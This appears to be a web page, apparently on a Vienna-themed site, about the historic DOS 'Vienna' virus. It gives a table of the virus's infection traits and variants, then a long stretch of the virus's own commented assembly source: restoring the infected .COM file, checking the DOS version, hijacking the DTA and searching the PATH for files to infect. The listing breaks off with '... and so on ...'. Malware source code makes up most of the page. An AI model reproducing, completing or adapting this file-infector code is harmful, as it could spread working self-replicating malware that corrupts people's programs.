|
|
Here is a short description of what the VIENNA-virus does: A Infects Fixed Disk Partition Table-A-------------------+ 9 Infects Fixed Disk Boot Sector-----9-----------------+ | 8 Infects Floppy Diskette Boot-------8---------------+ | | 7 Infects Overlay Files--------------7-------------+ | | | 6 Infects EXE Files------------------6-----------+ | | | | 5 Infects COM files------------------5---------+ | | | | | 4 Infects COMMAND.COM----------------4-------+ | | | | | | 3 Virus Installs Self in Memory------3-----+ | | | | | | | 2 Virus Uses Self-Encryption---------2---+ | | | | | | | | 1 Virus Uses STEALTH Techniques------1-+ | | | | | | | | | | | | | | | | | | | Increase in | | | | | | | | | | Infected | | | | | | | | | | Program's | | | | | | | | | | Size 1 2 3 4 5 6 7 8 9 A | | | | | | | | | | | | Virus V V V V V V V V V V V Damage ----------------------------------------------------------------------------- 1014 [Vienna] . . x x x . . . . . 1014 O P L Christmas Violator[Vienna] . . . x x . . . . . 5302 O P D Violator (5) [Vienna] . . . x x . . . . . 1055 O P D LEGEND: The Vienna-Virus Source-code: ;****************************************************************************** MOV_CX MACRO X DB 0B9H DW X ENDM CODE SEGMENT ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE ORG $+0100H ;***************************************************************************** ;Start out with a JMP around the remains of the original .COM file, into the ;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. ;The rest of the file (first 3 bytes) are stored in the virus data area. ;***************************************************************************** VCODE: JMP virus ;This was the rest of the original .COM file. Tiny and simple, this time NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP ;************************************************************ ; The actual virus starts here ;************************************************************ v_start equ $ virus: PUSH CX MOV DX,OFFSET vir_dat ;This is where the virus data starts. ; The 2nd and 3rd bytes get modified. CLD ;Pointers will be auto INcremented MOV SI,DX ;Access data as offset from SI ADD SI,first_3 ;Point to original 1st 3 bytes of .COM MOV DI,OFFSET 100H ;`cause all .COM files start at 100H MOV CX,3 REPZ MOVSB ;Restore original first 3 bytes of .COM MOV SI,DX ;Keep SI pointing to the data area ;************************************************************* ; Check the DOS version ;************************************************************* MOV AH,30H INT 21H CMP AL,0 ;0 means it's version 1.X JNZ dos_ok ;For version 2.0 or greater JMP quit ;Don't try to infect version 1.X ;************************************************************* ; Here if the DOS version is high enough for this to work ;************************************************************* dos_ok: PUSH ES ;************************************************************* ; Get DTA address into ES:BX ;************************************************************* MOV AH,2FH INT 21H ;************************************************************* ; Save the DTA address ;************************************************************* MOV [SI+old_dta],BX MOV [SI+old_dts],ES ;Save the DTA address POP ES ;************************************************************* ; Set DTA to point inside the virus data area ;************************************************************* MOV DX,dta ;Offset of new DTA in virus data area ; NOP ;MASM will add this NOP here ADD DX,SI ;Compute DTA address MOV AH,1AH INT 21H ;Set new DTA to inside our own code PUSH ES PUSH SI MOV ES,DS:2CH MOV DI,0 ;ES:DI points to environment ;************************************************************ ; Find the "PATH=" string in the environment ;************************************************************ find_path: POP SI PUSH SI ;Get SI back ADD SI,env_str ;Point to "PATH=" string in data area LODSB MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long REPNZ SCASB ;Search for first character MOV CX,4 ;************************************************************ ; Loop to check for the next four characters ;************************************************************ check_next_4: LODSB SCASB JNZ find_path ;If not all there, abort & start over LOOP check_next_4 ;Loop to check the next character POP SI POP ES MOV [SI+path_ad],DI ;Save the address of the PATH MOV DI,SI ADD DI,wrk_spc ;File name workspace MOV BX,SI ;Save a copy of SI ADD SI,wrk_spc ;Point SI to workspace MOV DI,SI ;Point DI to workspace JMP SHORT slash_ok ;********************************************************** ; Look in the PATH for more subdirectories, if any ;********************************************************** set_subdir: CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? JNZ found_subdir ;If not, there are more subdirectories JMP all_done ;Else, we're all done ;********************************************************** ; Here if there are more subdirectories in the path ;********************************************************** found_subdir: PUSH DS PUSH SI MOV DS,ES:2CH ;DS points to environment segment MOV DI,SI MOV SI,ES:[DI+path_ad] ;SI = PATH address ADD DI,wrk_spc ;DI points to file name workspace ;*********************************************************** ; Move subdirectory name into file name workspace ;*********************************************************** move_subdir: LODSB ;Get character CMP AL,';' ;Is it a ';' delimiter? JZ moved_one ;Yes, found another subdirectory CMP AL,0 ;End of PATH string? JZ moved_last_one ;Yes STOSB ;Save PATH marker into [DI] JMP SHORT move_subdir ;****************************************************************** ; Mark the fact that we're looking through the final subdirectory ;****************************************************************** moved_last_one: MOV SI,0 ... and so on ...
The source of the virus Vienna was published in Russia. How the story began Startseite - Wien - Fotos - Musik - Reisetipps - Tours - Donaufahrt - Kaffeehaus - Heuriger/Wein - Links - Suchen - Impressum |